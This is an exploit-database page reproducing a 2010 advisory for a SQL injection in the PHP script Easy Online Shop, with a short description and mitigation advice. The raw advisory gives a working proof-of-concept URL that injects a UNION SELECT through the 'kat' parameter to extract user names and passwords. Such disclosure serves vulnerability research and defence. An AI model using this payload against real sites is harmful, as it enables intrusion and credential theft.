Easy Online Shop - exploit.company

vendor:

Easy Online Shop

by:

Easy Laster

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Easy Online Shop

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Easy Online Shop <= SQL injection Vulnerability Proof of Concept

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The request contains a malicious SQL query in the 'kat' parameter which is used to extract data from the 'users' table. The malicious query is constructed using the UNION operator and the CONCAT() function to concatenate the 'name' and 'password' columns.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also use parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : Easy Online Shop <=  SQL injection Vulnerability Proof of Concept
+Autor : Easy Laster
+Date   : 17.12.2010
+Script  : Easy Online Shop
+Vendor : http://www.mhproducts.de/
+Price : 8,90 
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project.com
+Greetz to Team-Internet ,Underground Agents and free-hack.com
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco.
  
---------------------------------------------------------------------------------------
                                                                                       
 ___ ___ ___ ___                         _ _           _____           _         _ 
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|
                                              |___|                 |___|          
  
  
----------------------------------------------------------------------------------------
+Proof of Concept
+Table : users
+columns : name,password
+Proof of Concept : http://server/easyonlineshop/content.php?kat='+union+select+1
,2,3,4,concat(name,0x3a,password),6,7,8,9,10+from+users--+
----------------------------------------------------------------------------------------